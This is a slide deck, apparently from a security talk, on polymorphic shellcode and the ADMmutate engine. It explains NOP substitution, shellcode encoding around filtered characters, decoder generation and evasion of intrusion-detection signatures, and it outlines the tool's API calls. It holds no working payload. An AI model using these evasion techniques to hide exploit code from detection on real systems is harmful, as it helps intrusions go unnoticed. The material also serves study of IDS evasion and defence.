Polymorphic Shellcode

1
Polymorphic Shellcode

• By K2 (ktwo_at_ktwo.ca)

2
Topics

• NIDS Evasion
• Polymorphic properties
• Buffer Overflows
• Implementations
• SMART features
• Future

3
NIDS Functions

• Alarm to suspicious events
• Usually defined by rule and signature criteria
• Configured to look for known events
• New vulnerabilities appear weekly
• Statistical analysis
• Can False frequently
• Its a hard job!!

4
NIDS Evasion

• Network Layer
• IP Fragmentation
• Spoofed data
• Application Layer
• Data obfuscation
• Unicode
• Alternate operators (.. .\.)
• Code/Data encoding
• Polymorphism

5
Polymorphic properties

• Polymorphism
• The ability to exist in multiple forms
• There is more then one way to perform the same
  function
• Out of Order execution
• Non-Operational code padding
• Random in nature

6
Shellcode

• NOPS
• Alignment
• Padding for offset jump
• 1 Byte long
• Usually (on IA32) 0x90
• Shellcode
• OS Specific
• Execute our instructions

7
Shellcode cont

• Offset Values
• Specify location of NOPS/Shellcode
• Unique to host
• Host configuration can require modified offset
  values
• IDS usually target NOP or Shellcode sequences for
  signature generation

8
Polymorphic Shellcode

• NOP Substitution
• Any one byte instruction can accomplish the same
  function
• So long as no illegal operation is performed
• Multi-byte instructions can be used if both bytes
  can be decoded to single byte instructions

9
Shellcode encoding

• Shellcode is encoded to avoid a pattern match
• /bin/sh
• SMART Features
• Can be engineered to conform to many restrictions
• toupper, tolower, isspace
• Misc banned char
• Must be decoded on target host.

10
Decoder generation

• Must possess Polymorphic properties
• Alternate instruction paths / Out of order
  execution
• A B C D
• B C A D
• More than one way to calculate a result
• 2 2 4
• 8 / 2 4

11
Decoder generation

• Operational padding
• A B C D
• A (21-3) B (-33) (3-3) C D
• Wildcard code generation
• Or eax,X
• Add eax,X
• Xchg eax,X
• Eax is optimized

12
Optional functions

• Offset modulation
• Automatically modulate offset for smaller
  signature hit
• Truncate buffer to clean up any binary chaff
• Output to C style array to aid analysis

13
Implementation details

• API for exploit coders
• Filter for kiddie lusers
• Black box
• Shellcode can be variable size
• OS independent
• 32-bit Key/Calculations
• 2 16-bit keys
• 1KB shellcode size limit
• May be increased in future

14
API Notes

• Currently Supports IA32, SPARC, HPPA
• MIPS, Alpha, PowerPC under development
• Easily extended
• Add decoder structure
• Implement hardcode offset/jump calculations

15
API Details

• Simply add
• include "ADMmutapi.h"
• struct morphctl mut mut.upper 0 mut.lower
  0 mut.banned 0
• struct morphctl mctlp mut
• mut.arch IA32 / select architecture /
• init_mutate(mctlp) apply_key(buff,
  strlen(shellcode), nops, mctlp)
• apply_jnops(buff, nops, mut)
• apply_engine(buff, strlen(shellcode), nops, mut)
• ...

16
Future development

• Updates?
• http//www.ktwo.ca/security.html
• ftp//ADM.freelsd.net/pub/ADM
• Can we produce code/data that can evade
  statistical analysis?
• Sliding key?
• Multiple ciphers?

17
Questions?

• Dose it work?
• Yes.
• )